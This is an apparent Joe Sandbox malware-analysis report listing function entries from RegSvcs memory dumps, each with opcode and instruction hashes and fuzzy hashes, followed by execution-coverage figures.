                                                                                                                                                                                • Instruction ID: c440b1a48e8111fbd8128c80cb8f33a9e144a5b3c7097e3335b256f3b8c2fde4
                                                                                                                                                                                • Opcode Fuzzy Hash: ca79877d5fae97cb43934dc5d7d514872cda90bd5afd63257fe8844bec097249
                                                                                                                                                                                • Instruction Fuzzy Hash: 1DC1D274E00218CFDB54DFA9D984BADBBB6EF89300F6080A9D808A7355DB359E85CF50
                                                                                                                                                                                Function 019AE4E1 Relevance: .3, Instructions: 271COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 565a6b50218e44863a31284fd5a25619453a161df919c8e2e8bbf67b2dfaebe8
                                                                                                                                                                                • Instruction ID: d3a22ea7ff86cf2c9145f8c13b576c0b8ed01e47e7014e1b5770fed0027c5fc1
                                                                                                                                                                                • Opcode Fuzzy Hash: 565a6b50218e44863a31284fd5a25619453a161df919c8e2e8bbf67b2dfaebe8
                                                                                                                                                                                • Instruction Fuzzy Hash: ABC1C274E00218CFDB54DFA9D984BADBBB6BF88300F6080A9D808A7355DB359E85CF51
                                                                                                                                                                                Function 019AF779 Relevance: .3, Instructions: 271COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 42d372171ec5e1be8293d819b47603b1229eff950adaf707228e4c2e1445b17b
                                                                                                                                                                                • Instruction ID: 4796dc2c6bffb19579e43747bf733b852792a66f19db9f7858600e35bdc0c2fa
                                                                                                                                                                                • Opcode Fuzzy Hash: 42d372171ec5e1be8293d819b47603b1229eff950adaf707228e4c2e1445b17b
                                                                                                                                                                                • Instruction Fuzzy Hash: 15C1D174E00218CFDB54DFA9D984BADBBB6EF89300F2080A9D808AB355DB359D85CF50
                                                                                                                                                                                Function 019AE938 Relevance: .3, Instructions: 271COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: ca6c0a9fd8ff8eed64864bfa1e58c3697f2f1cb7719044dee0fb651f8ac31895
                                                                                                                                                                                • Instruction ID: 7f7e2d9f3d30bd76c1e64c874550099fb700da12d344b731dc50d9be69f1874c
                                                                                                                                                                                • Opcode Fuzzy Hash: ca6c0a9fd8ff8eed64864bfa1e58c3697f2f1cb7719044dee0fb651f8ac31895
                                                                                                                                                                                • Instruction Fuzzy Hash: B1C1E374E00218CFDB54DFA9D944BADBBB6BF88300F6084A9D408AB355DB359E85CF51
                                                                                                                                                                                Function 019AED95 Relevance: .3, Instructions: 270COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 55babc4cf290db4e90982ce02b28328ae9a3e3beec0752ad87035fc086536ef2
                                                                                                                                                                                • Instruction ID: 90dba28fc6b1d4f1651b85b96eb355189b02e325eadd89078a39c895d91aa2ce
                                                                                                                                                                                • Opcode Fuzzy Hash: 55babc4cf290db4e90982ce02b28328ae9a3e3beec0752ad87035fc086536ef2
                                                                                                                                                                                • Instruction Fuzzy Hash: 29C1C274E00218CFDB54DFA9D984BADBBB6BF89300F6080A9D808A7355DB359D85CF50
                                                                                                                                                                                Function 068EE288 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3403801741.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_68e0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 726e45311b305bb6f9d3360735a9f63bfac859ab8ef99a32dd0fa333fdc5e87d
                                                                                                                                                                                • Instruction ID: 8f8296eb36843a1186599e013163fc0150388f759b7f021b1c246d5681e59a40
                                                                                                                                                                                • Opcode Fuzzy Hash: 726e45311b305bb6f9d3360735a9f63bfac859ab8ef99a32dd0fa333fdc5e87d
                                                                                                                                                                                • Instruction Fuzzy Hash: 40C1C274E00218CFDB54DFA5D984BADBBB6BF89300F2080A9D809AB365DB359D85CF51
                                                                                                                                                                                Function 068EB4B8 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3403801741.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_68e0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 294aee834d683dbc95111e711782bdffb2c75d496faed1b8fae287efa463d7b5
                                                                                                                                                                                • Instruction ID: 0c4436fdbab984188640fb683ff39937db071e1d7f0a1317004bc9e6375d1573
                                                                                                                                                                                • Opcode Fuzzy Hash: 294aee834d683dbc95111e711782bdffb2c75d496faed1b8fae287efa463d7b5
                                                                                                                                                                                • Instruction Fuzzy Hash: 71C1C174E00218CFDB54DFA5D984BADBBB6BF89300F2080A9D809AB355DB359E85CF51
                                                                                                                                                                                Function 068E8AB0 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3403801741.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_68e0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 0c3aa162508a95a36f163786fa0c35751196d290c68331c7100344422acf23cb
                                                                                                                                                                                • Instruction ID: 40df9ac98845276f4d4000d0ff335ef6622ac108289c0c75fd2fc4470e201092
                                                                                                                                                                                • Opcode Fuzzy Hash: 0c3aa162508a95a36f163786fa0c35751196d290c68331c7100344422acf23cb
                                                                                                                                                                                • Instruction Fuzzy Hash: CDC1B074E00218CFDB54DFA5D984BADBBB6BF89300F2080A9D809AB355DB359E85CF51
                                                                                                                                                                                Function 068EE6E0 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3403801741.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_68e0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 2d8bea2876dc6d3b1c79551d7b7ade881a97bb59cc31f93ff2e1b2a9fff580db
                                                                                                                                                                                • Instruction ID: 7c0d93d961c02f038db44eaf018121f7b33747f85b11311ac1b654a60ad6c75a
                                                                                                                                                                                • Opcode Fuzzy Hash: 2d8bea2876dc6d3b1c79551d7b7ade881a97bb59cc31f93ff2e1b2a9fff580db
                                                                                                                                                                                • Instruction Fuzzy Hash: 73C1A074E00218CFDB54DFA5D984BADBBB6AF89300F2080A9D809AB355DB359E85CF51
                                                                                                                                                                                Function 068EAC08 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3403801741.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_68e0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 235c310653348cf1c87b5c87365fd16d24f0cb6954763b031b46462bd5588ed2
                                                                                                                                                                                • Instruction ID: 1da7177ec05590a8a90d3c603d17d4e2089101099abe0f92c5d6777e2528aea1
                                                                                                                                                                                • Opcode Fuzzy Hash: 235c310653348cf1c87b5c87365fd16d24f0cb6954763b031b46462bd5588ed2
                                                                                                                                                                                • Instruction Fuzzy Hash: A8C1C174E00218CFDB54DFA5D984BADBBB6BF89300F2080A9D809AB355DB359E85CF51
                                                                                                                                                                                Function 068E8200 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3403801741.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_68e0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: b84c613a71030254dffe5f03da308297fc30a412681dcd5d7f1e0fc8e7b53c7f
                                                                                                                                                                                • Instruction ID: 06c22cc4421e68619d29f66628d01a7d9ea2339e4380b2a342f4ffb2798e9792
                                                                                                                                                                                • Opcode Fuzzy Hash: b84c613a71030254dffe5f03da308297fc30a412681dcd5d7f1e0fc8e7b53c7f
                                                                                                                                                                                • Instruction Fuzzy Hash: 75C1B174E00218CFDB64DFA5D944BADBBB6BF89300F2080A9D809AB355DB359E85CF51
                                                                                                                                                                                Function 068EDE30 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3403801741.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_68e0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 468f246129c31be5fc9255ef14d0df84df5c71e1073dbaa36aeee48c4c08fd13
                                                                                                                                                                                • Instruction ID: c87ae272c2583e0b8b78001411e1153a69b9075949152450279e70a6ae2bbae1
                                                                                                                                                                                • Opcode Fuzzy Hash: 468f246129c31be5fc9255ef14d0df84df5c71e1073dbaa36aeee48c4c08fd13
                                                                                                                                                                                • Instruction Fuzzy Hash: DBC1B074E00218CFDB54DFA5D984BADBBB6BF89300F2080A9D809AB355DB359E85CF51
                                                                                                                                                                                Function 068EF840 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3403801741.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_68e0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 354d404cfaa13703982d115d2de8844908815d80de3d2dc80b01c1eb1d814d77
                                                                                                                                                                                • Instruction ID: 3b75322bef000717783ac64d88d11a415974ef2be3bdf691d87f4e821e0bd592
                                                                                                                                                                                • Opcode Fuzzy Hash: 354d404cfaa13703982d115d2de8844908815d80de3d2dc80b01c1eb1d814d77
                                                                                                                                                                                • Instruction Fuzzy Hash: 49C1B174E00218CFDB54DFA5D984BADBBB6BF89300F2080A9D809AB355DB359E85CF51
                                                                                                                                                                                Function 068E8658 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3403801741.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_68e0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a0464bc0d1c45a50fa1bd14747bd1543e550df48d7559b9963132be3f5d5761e
                                                                                                                                                                                • Instruction ID: e1e94c4a11f9372b7cd6208764f5177091cc7042db45efe4fb69ff5238247ee2
                                                                                                                                                                                • Opcode Fuzzy Hash: a0464bc0d1c45a50fa1bd14747bd1543e550df48d7559b9963132be3f5d5761e
                                                                                                                                                                                • Instruction Fuzzy Hash: F3C1B074E00218CFDB54DFA5D984BADBBB6BF89300F2080A9D809AB355DB359E85CF51
                                                                                                                                                                                Function 068EB060 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3403801741.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_68e0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 109866c7cfab0295f34bcb3f58dce4037161f8d15087c645d81e172418099066
                                                                                                                                                                                • Instruction ID: f44fd960d725c2661d4539b49a1d93e50f8e843b40b026ce55555bb3e205c13f
                                                                                                                                                                                • Opcode Fuzzy Hash: 109866c7cfab0295f34bcb3f58dce4037161f8d15087c645d81e172418099066
                                                                                                                                                                                • Instruction Fuzzy Hash: 7AC1B174E00218CFDB54DFA5D984BADBBB6EF89304F2080A9D808AB355DB359E85CF51
                                                                                                                                                                                Function 068ED580 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3403801741.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_68e0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: d0dad9e72f1030827b0e5c8cbb5c5b56d55e1afe54ba189376d50bd61244b7b8
                                                                                                                                                                                • Instruction ID: d84dd1ed768dc82eddc50adf5a2c2676e88fd2246af11e2afa4145c10a4363f9
                                                                                                                                                                                • Opcode Fuzzy Hash: d0dad9e72f1030827b0e5c8cbb5c5b56d55e1afe54ba189376d50bd61244b7b8
                                                                                                                                                                                • Instruction Fuzzy Hash: FFC1B174E00218CFDB54DFA5D984BADBBB6EF89300F2090A9D808AB355DB359E85CF51
                                                                                                                                                                                Function 068EEF90 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3403801741.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_68e0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 46bc2e3437ac05110e83e3bf66022489160734e2a8de962d0a26e27881c12b69
                                                                                                                                                                                • Instruction ID: 2a869c0d98f698c8654546051ba001ad4b7b7beafd6184b26f7bdc3f7b1c3a61
                                                                                                                                                                                • Opcode Fuzzy Hash: 46bc2e3437ac05110e83e3bf66022489160734e2a8de962d0a26e27881c12b69
                                                                                                                                                                                • Instruction Fuzzy Hash: 75C1A174E00218CFDB54DFA5D984BADBBB6BF89300F2080A9D809AB355DB359E85CF51
                                                                                                                                                                                Function 068E7DA8 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3403801741.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_68e0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 0c5320ba387075df36ac850b9089433b2cd59d864c0bc26d98f7bae77b39ddfe
                                                                                                                                                                                • Instruction ID: 51d4ebbb4e95662729024f77d55a00db47e89ccefdec105d1f863e985612699d
                                                                                                                                                                                • Opcode Fuzzy Hash: 0c5320ba387075df36ac850b9089433b2cd59d864c0bc26d98f7bae77b39ddfe
                                                                                                                                                                                • Instruction Fuzzy Hash: E9C1B074E00218CFDB54DFA5D984BADBBB6BF89300F2080A9D809AB355DB359E85CF51
                                                                                                                                                                                Function 068EA7B0 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3403801741.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_68e0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 8fd6752965831b56689a73e41cd18442c935409df0d76e269b0d0e38a57ca1a7
                                                                                                                                                                                • Instruction ID: ee158a81ebfff3e80ae7b852f793b44ad5aaadefdae7b4423345180384617f15
                                                                                                                                                                                • Opcode Fuzzy Hash: 8fd6752965831b56689a73e41cd18442c935409df0d76e269b0d0e38a57ca1a7
                                                                                                                                                                                • Instruction Fuzzy Hash: B9C1B274E00218CFDB54DFA5D944BADBBB6AF89300F2080A9D809AB355DB359E85CF51
                                                                                                                                                                                Function 068ED9D8 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3403801741.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_68e0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 5702790a1bc0006afc9108266afd224c26072e0d65c9551e85de85ba7e2c0835
                                                                                                                                                                                • Instruction ID: 9db73070a87f4ac85c75caf617d82b5f075fcac96e49d2a1d4568fc510f65165
                                                                                                                                                                                • Opcode Fuzzy Hash: 5702790a1bc0006afc9108266afd224c26072e0d65c9551e85de85ba7e2c0835
                                                                                                                                                                                • Instruction Fuzzy Hash: 2BC1C274E00218CFDB54DFA5D944BADBBB6AF89300F2080A9D809AB355DB359E85CF50
                                                                                                                                                                                Function 068EF3E8 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3403801741.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_68e0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: ca4ac5f827de01e067d51a55a5a124da561923c34ed779d8617c036e4331bc2f
                                                                                                                                                                                • Instruction ID: 77af1800a882ad960d208e9283e0b327c89db779fba17f8c9e90b13863310154
                                                                                                                                                                                • Opcode Fuzzy Hash: ca4ac5f827de01e067d51a55a5a124da561923c34ed779d8617c036e4331bc2f
                                                                                                                                                                                • Instruction Fuzzy Hash: 1FC1C274E00218CFDB54DFA5D984BADBBB6AF89300F2080A9D809AB355DB359D85CF51
                                                                                                                                                                                Function 068E8F08 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3403801741.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_68e0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: c9c8277b707b463f67b166b6d761f47af5d72d57d6e5a651c5a3a65f1a7102ca
                                                                                                                                                                                • Instruction ID: 30b3120978f8999fe71db077e1855057387839c7285c74f347219bcf087018ee
                                                                                                                                                                                • Opcode Fuzzy Hash: c9c8277b707b463f67b166b6d761f47af5d72d57d6e5a651c5a3a65f1a7102ca
                                                                                                                                                                                • Instruction Fuzzy Hash: 25C1C074E00218CFDB54DFA5D984BADBBB6BF89300F2090A9D809AB355DB359E85CF50
                                                                                                                                                                                Function 068EB910 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3403801741.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_68e0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: cfa8f0896b6261e3443f8a5c18857c473b1e0ddfade63137e5632beb42a934ec
                                                                                                                                                                                • Instruction ID: 7215a36844ba9a724bbae2926a90d7215e3b57328904e99aefd389d11b865ce5
                                                                                                                                                                                • Opcode Fuzzy Hash: cfa8f0896b6261e3443f8a5c18857c473b1e0ddfade63137e5632beb42a934ec
                                                                                                                                                                                • Instruction Fuzzy Hash: 43C1B074E00218CFDB54DFA5D984BADBBB6BF89300F2080A9D809AB355DB359E85CF51
                                                                                                                                                                                Function 068ED128 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3403801741.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_68e0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: bfea700180e5a3e36ee635507f97dea3e8ac1defd33265a613005a00c696cc6d
                                                                                                                                                                                • Instruction ID: 86be7b6056b4d85564aecc82b5a94d80be681ec3898e3219c421c0fe24a0014d
                                                                                                                                                                                • Opcode Fuzzy Hash: bfea700180e5a3e36ee635507f97dea3e8ac1defd33265a613005a00c696cc6d
                                                                                                                                                                                • Instruction Fuzzy Hash: EAC1C074E00218CFDB54DFA5D984BADBBB6EF89304F2090A9D808AB355DB359E85CF50
                                                                                                                                                                                Function 068EEB38 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3403801741.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_68e0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a4cbcdfedd95134af457a18aed2792166fa10dd53bf37543896528a6490a1952
                                                                                                                                                                                • Instruction ID: 8d30485109e9a6ecf5e0fd9f2244d56e90437673fa823a7638f7428a87c70550
                                                                                                                                                                                • Opcode Fuzzy Hash: a4cbcdfedd95134af457a18aed2792166fa10dd53bf37543896528a6490a1952
                                                                                                                                                                                • Instruction Fuzzy Hash: 8CC1C274E00218CFDB54DFA5D984BADBBB6BF89300F2080A9D809AB355DB359E85CF51
                                                                                                                                                                                Function 068EBD68 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3403801741.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_68e0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 60a608da1ad93778ca581f5400f61bf3312f8c6b4feead92da7dc367e4f327e6
                                                                                                                                                                                • Instruction ID: 39b37e1c122ee610df782386b92f43644e24992f796275f745c0ac035e150f31
                                                                                                                                                                                • Opcode Fuzzy Hash: 60a608da1ad93778ca581f5400f61bf3312f8c6b4feead92da7dc367e4f327e6
                                                                                                                                                                                • Instruction Fuzzy Hash: 56C1B174E00218CFDB54DFA5D984BADBBB6BF89300F2080A9D809AB355DB359E85CF51
                                                                                                                                                                                Function 019A58E8 Relevance: 5.0, Strings: 4, Instructions: 49COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000011.00000002.3377777885.00000000019A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_17_2_19a0000_RegSvcs.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: \;]q$\;]q$\;]q$\;]q
                                                                                                                                                                                • API String ID: 0-2351511683
                                                                                                                                                                                • Opcode ID: dae7f85aad0742189d23598a71309331969a0c3c64e980fae58a38f7d770b1a7
                                                                                                                                                                                • Instruction ID: d9bb9155e266a36c841cb8c01ffc58b830081a638ed369d4b483993f27b8fb36
                                                                                                                                                                                • Opcode Fuzzy Hash: dae7f85aad0742189d23598a71309331969a0c3c64e980fae58a38f7d770b1a7
                                                                                                                                                                                • Instruction Fuzzy Hash: 5801B1717401058FAB648E2CC49092977EAAFCA6717D64869E54ECF370DA31DC49C7C0

                                                                                                                                                                                Execution Graph

                                                                                                                                                                                Execution Coverage:5.2%
                                                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                Signature Coverage:0%
